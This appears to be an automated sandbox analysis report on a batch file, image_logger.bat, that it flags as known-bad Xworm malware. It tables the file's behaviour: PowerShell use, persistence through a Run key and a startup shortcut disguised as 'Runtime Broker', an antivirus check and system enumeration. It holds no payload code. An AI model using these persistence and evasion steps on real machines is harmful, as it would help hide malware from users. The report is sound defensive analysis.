Analysis Overview
SHA256
7905527e602b2147d25e7d1698c70a408bd0d94aa539f347e41c070e157feee0
Threat Level: Known bad
The file image_logger.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Modifies firewall policy service
Modifies security service
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Checks for any installed AV software in registry
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Enumerates system info in registry
Modifies registry class
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-31 17:11
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-31 17:11
Reported
2024-05-31 17:53
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{38A70F3A-E4BC-4B78-9A8F-604142130FC2} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort2_10=4381-4390|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{A5809AB4-1447-424D-A7F5-E02A6799CC4B} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort2_10=8080-8082|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{EFA79DB4-4312-4D5C-B0C6-538EED48690E} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=57621|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{95CD1AC0-CDAF-4956-B88B-05BAAAD8E545} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort2_10=4371-4379|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{84C5AF36-9E0F-497A-952D-53D6E57A47FA} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=8088|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{4803A624-CA39-4792-AC8C-A82A5B19A041} = "v2.30|Action=Allow|Active=TRUE|Dir=Out|Protocol=17|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{4622DBAA-312D-4177-9FBA-334E1F834462} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Spotify Music|Desc=Spotify Music|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|EmbedCtxt=Spotify Music|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{382DAE2E-0E76-434A-8E9C-F0D8B5D05677} = "v2.30|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=Spotify Music|Desc=Spotify Music|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|EmbedCtxt=Spotify Music|Platform=2:6:2|Platform2=GTEQ|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B0BFDC9B-A232-4C17-9BBC-AA19585CC19E} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=8443|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{9A27FC89-1236-48D3-BE87-557BD3010D42} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=8088|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{DAC0E786-DA8B-4FE8-882C-D20E3363D755} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort2_10=57621-57631|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F8F32B69-5F31-4CD4-974E-C15B217713BA} = "v2.30|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{ED4FF9B6-19FD-4408-A6CA-A6636FA472CC} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Spotify Music|Desc=Spotify Music|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|EmbedCtxt=Spotify Music|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{E66ABA8D-A38E-489B-8051-F942FE179672} = "v2.30|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=Spotify Music|Desc=Spotify Music|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|EmbedCtxt=Spotify Music|" | C:\Windows\system32\svchost.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031S-1-5-21-3808065738-1666277613-1125846146-1000 = "v2.30|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|C=S-1-15-3-1|C=S-1-15-3-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|M=spotifyab.spotifymusic_zpdnekdrzrea0|Name=Spotify Music|Desc=Spotify Music|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031S-1-5-21-3808065738-1666277613-1125846146-1000 = "v2.30|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|C=S-1-15-3-1|C=S-1-15-3-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|M=spotifyab.spotifymusic_zpdnekdrzrea0|Name=Spotify Music|Desc=Spotify Music|D=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\|PFN=SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0|" | C:\Windows\system32\svchost.exe | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avast Software\Avast | C:\Windows\system32\svchost.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\SoftwareDistribution\Download\4fc661cc8878223712c18124f63a67cb\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\SLS\2B81F1BF-356C-4FA1-90F1-7581A62C6764\sls.cab | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\2B81F1BF-356C-4FA1-90F1-7581A62C6764\TMP2C2E.tmp | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\sls.cab | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\aa1e73f47f2fd04b51fc5324f663033c\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\929ae566f1f233c13a3bbf347b449657\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMP4E2E.tmp | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\855E8A7C-ECB4-4CA3-B045-1DFA50104289\sls.cab | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\b38597ddf936e9cb72180a70de5f06a3\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edbtmp.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\855E8A7C-ECB4-4CA3-B045-1DFA50104289\TMP5091.tmp | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\DataStore\Logs\tmp.edb | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\9daa50bb873acacf7c3bddfd29b3041e\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0012 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001C | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0025 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0025 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0025 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0025 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001B | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0012 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001B | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0012 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001B | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0012 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001C | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001B | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | C:\Windows\system32\svchost.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
